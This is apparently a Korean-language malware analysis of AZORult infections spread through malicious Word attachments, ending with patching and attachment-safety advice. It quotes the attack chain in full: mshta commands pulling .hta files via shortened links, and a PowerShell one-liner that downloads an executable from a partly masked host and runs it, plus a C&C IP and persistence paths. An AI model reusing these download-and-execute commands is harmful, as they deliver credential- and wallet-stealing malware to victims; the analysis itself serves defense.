최근 국내에서 메일 첨부 파일로 전파된 악성 MS Word 문서를 실행할 경우 취약점(Exploit)을 통해 AZORult 악성코드에 감염되는 사례가 확인되어 살펴보도록 하겠습니다.
mshta h**p://bit.ly/2Mjm*** &AAAAAAAAAAAAAAAC→ h**p://vektorex.com/****/boss39Report.htamshta http://bit.ly/2Mg3*** &AAAAAAAAAAAAAAAC→ h**p://vektorex.com/****/bill304Report.htamshta http://bit.ly/2MfA*** &AAAAAAAAAAAAAAAC→ h**p://vektorex.com/****/edyiReport.hta
bit.ly 단축 URL 서비스를 통해 연결된 웹 페이지에서는 특정 .hta 파일을 실행하도록 구성되어 있습니다.
.hta 파일(SHA-1 : 8c7d6154ec4a95ef69cc33846abf9f5f374a0541)에서는 Windows Powershell 기능을 이용하여 특정 .exe 파일 다운로드를 하도록 구성되어 있는 스크립트가 포함되어 있습니다.
"C:\Windows\System32\cmd.exe" /c powershell (new-object System.Net.WebClienT).DownloadFile('h**p://vektorex.com/****/650890977.exe','%temp%\ufsdfs.exe'); Start '%temp%\ufsdfs.exe'
실행된 "%Temp%\ufsdfs.exe" 악성 파일은 "C:\Users\%UserName%\AppData\Roaming\oihsnfg\bsyguh.exe" 파일명으로 자기 자신을 복제한 후 실행합니다.
실행된 악성코드는 104.233.105.159 IP 서버를 사용하는 C&C 서버와 최초 통신을 시도하는 것을 확인할 수 있습니다.
해당 C&C 서버에서는 AZORult 악성코드 계열임을 알 수 있으며, 2019년 1월 14일경부터 운영되고 있는 것으로 추정됩니다.
감염된 PC 환경에서는 "C:\Users\%UserName%\AppData\Local\Temp\2fda" 폴더를 생성하여 내부에 Mozilla Firefox 웹 브라우저 관련 파일 등의 다수의 모듈을 추가 생성하여 웹 브라우저에 저장된 인증서, 쿠키, 계정 정보 등을 수집하여 외부로 유출할 수 있습니다.
그 외에도 특정 위치에 존재하는 파일 수집, FTP / 메신저 / 이메일 계정 정보 수집, 암호 화폐 지갑 탈취, PC 정보 수집, 추가적인 파일 다운로드 등의 다양한 악의적 기능을 수행하며, 과거부터 지속적인 빌더(Builder) 버전 업데이트를 통해 기능을 추가하고 있는 것으로 보입니다.
그러므로 AZORult 악성코드에 감염되지 않기 위해서는 Windows, 웹 브라우저, Adobe Flash Player, MS Office 프로그램에 대한 최신 보안 패치를 꾸준히 업데이트하시기 바라며, 메일을 통해 수신된 첨부 파일 실행 시에는 항상 주의하여 피해를 당하는 일이 없도록 하시기 바랍니다.